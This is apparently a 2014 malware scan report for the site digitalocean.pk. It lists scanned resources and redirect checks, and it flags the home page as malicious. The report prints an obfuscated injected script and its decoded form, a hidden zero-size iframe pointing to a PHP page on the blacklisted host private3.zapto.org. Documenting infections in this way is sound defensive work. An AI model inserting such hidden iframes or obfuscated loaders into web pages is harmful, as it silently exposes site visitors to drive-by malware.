Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=digitalocean.pk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://digitalocean.pk/ | 200 OK Content-Length: 26244 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: private3.zapto.org var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62c ...[1839 bytes skipped]... Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> | ||
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://www.google.com/cse/t13n?form=cse-search-box&t13n_langs=am%2Cel%2Cml%2Cpa%2Cta%2Cte%2Cru%2Cmr%2Cgu%2Car%2Cbn%2Chi%2Cne%2Csa%2Cti%2Cur%2Csr%2Cfa%2Ckn%2Cen | 200 OK Content-Length: 2274 Content-Type: text/javascript | clean |
http://www.google.com.pk/coop/cse/brand?form=cse-search-box&lang=en | 200 OK Content-Length: 2518 Content-Type: text/javascript | clean |
http://hamariweb.com/webmaster-tools/muslim-prayer-times/pakistan-prayer-time.php | 200 OK Content-Length: 345 Content-Type: text/html | clean |
http://hamariweb.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://ifeed.vcricket.com/get_code.aspx?dk=6DEF657FC2514E8998F823928CB05638&sc=&sz=468x60 | 200 OK Content-Length: 379 Content-Type: text/html | clean |
http://ifeed.vcricket.com/\"http://www.vcricket.com/live_cricket_scores/Kolkata_vs_Perth-Scorchers.html\" | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://www.blogpolls.com/poll/73015.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://pub14.bravenet.com/counter/code.php?id=408020&usernum=1147980494&cpv=2 | 200 OK Content-Length: 336 Content-Type: text/html | clean |
http://www.neoworx.net/neocounter/neocounter2/neoworx_tracker.php?counter_id=525181400 | 200 OK Content-Length: 8246 Content-Type: text/html | clean |
http://d1vbm0eveofcle.cloudfront.net/scripts/js3caf.js | 200 OK Content-Length: 3490 Content-Type: application/javascript | clean |
http://neocounter.neoworx-blog-tools.net/neocounter2/neocounter_launcher_v4.js | 400 Bad Request Content-Length: 20 Content-Type: text/html | clean |
http://hamariweb.com/webmaster-tools/currency-converter/small-currency-converter.js | 200 OK Content-Length: 1925 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: digitalocean.pk
Result:
HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 01:56:59 GMT
Accept-Ranges: bytes
ETag: "4957bc447cecf1:0"
Server: Microsoft-IIS/8.0
Content-Length: 26244
Content-Type: text/html
Last-Modified: Thu, 11 Sep 2014 21:28:03 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...26244 bytes of data.
GET / HTTP/1.1
Host: digitalocean.pk
Result:
HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 01:56:59 GMT
Accept-Ranges: bytes
ETag: "4957bc447cecf1:0"
Server: Microsoft-IIS/8.0
Content-Length: 26244
Content-Type: text/html
Last-Modified: Thu, 11 Sep 2014 21:28:03 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...26244 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: digitalocean.pk
Referer: http://www.google.com/search?q=digitalocean.pk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: digitalocean.pk
Referer: http://www.google.com/search?q=digitalocean.pk
Result:
The result is similar to the first query. There are no suspicious redirects found.